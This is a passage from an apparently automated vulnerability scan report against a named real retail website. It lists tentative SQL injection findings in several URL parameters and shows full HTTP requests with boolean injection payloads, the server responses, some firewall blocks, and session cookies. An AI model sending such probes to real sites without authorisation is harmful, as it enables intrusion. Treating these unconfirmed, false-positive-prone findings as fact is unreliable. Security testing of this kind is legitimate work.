Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=30665613173906%20or%201%3D2%2D%2D%20;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:23 GMT
Content-Length: 23937
<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Brad's Deals of the Day</title>
<meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
<meta name="y_key" content="851f0d788ded642a" />
<meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
<meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
<meta name="y_key" content="7aee1ecd68e082ef" />
<meta name="y_key" content="33d564d1ed93f6ba" />
<meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" />
<link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />
<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
<link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />
<!-- RSS -->
<link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
<!-- /RSS -->
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
...[SNIP]...
|
1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/dealsoftheday/subscribe/b |
Issue detail
The utm_campaign parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_campaign parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:38 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">FD93-D5AD-C1CD-45A9</div>
</div>
</body>
</html>
|
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:39 GMT
Content-Length: 23937
<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Brad's Deals of the Day</title>
<meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
<meta name="y_key" content="851f0d788ded642a" />
<meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
<meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
<meta name="y_key" content="7aee1ecd68e082ef" />
<meta name="y_key" content="33d564d1ed93f6ba" />
<meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" />
<link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />
<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
<link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />
<!-- RSS -->
<link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
<!-- /RSS -->
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s
...[SNIP]...
|
1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/dealsoftheday/subscribe/b |
Issue detail
The utm_content parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_content parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d1--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">EC40-EAA6-197E-4D06</div>
</div>
</body>
</html>
|
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d2--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Content-Length: 23937
<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Brad's Deals of the Day</title>
<meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
<meta name="y_key" content="851f0d788ded642a" />
<meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
<meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
<meta name="y_key" content="7aee1ecd68e082ef" />
<meta name="y_key" content="33d564d1ed93f6ba" />
<meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" />
<link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />
<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
<link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />
<!-- RSS -->
<link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
<!-- /RSS -->
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s
...[SNIP]...
|
1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/dealsoftheday/subscribe/b |
Issue detail
The utm_medium parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_medium parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d1--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:51 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">812E-ADAC-F15B-DC88</div>
</div>
</body>
</html>
|
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d2--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:52 GMT
Content-Length: 23937
<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Brad's Deals of the Day</title>
<meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
<meta name="y_key" content="851f0d788ded642a" />
<meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
<meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
<meta name="y_key" content="7aee1ecd68e082ef" />
<meta name="y_key" content="33d564d1ed93f6ba" />
<meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" />
<link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />
<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
<link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />
<!-- RSS -->
<link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
<!-- /RSS -->
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s
...[SNIP]...
|
1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/dealsoftheday/subscribe/b |
Issue detail
The utm_source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d1--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">78FC-DB12-C099-3AAB</div>
</div>
</body>
</html>
|
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d2--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Content-Length: 23937
<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Brad's Deals of the Day</title>
<meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
<meta name="y_key" content="851f0d788ded642a" />
<meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
<meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
<meta name="y_key" content="7aee1ecd68e082ef" />
<meta name="y_key" content="33d564d1ed93f6ba" />
<meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" />
<link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />
<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
<link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />
<!-- RSS -->
<link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
<!-- /RSS -->
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s
...[SNIP]...
|
1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/res/opt/global.js |
Issue detail
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 62280894%20or%201%3d1--%20 and 62280894%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /res/opt/global.js?v=2011082962280894%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:39 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">7BBF-BAD8-1227-0783</div>
</div>
</body>
</html>
|
Request 2
GET /res/opt/global.js?v=2011082962280894%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Mon, 29 Aug 2011 21:05:22 GMT
Accept-Ranges: bytes
ETag: "095625d8f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:40 GMT
Content-Length: 192992
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009)
* Revision: 6246
*/
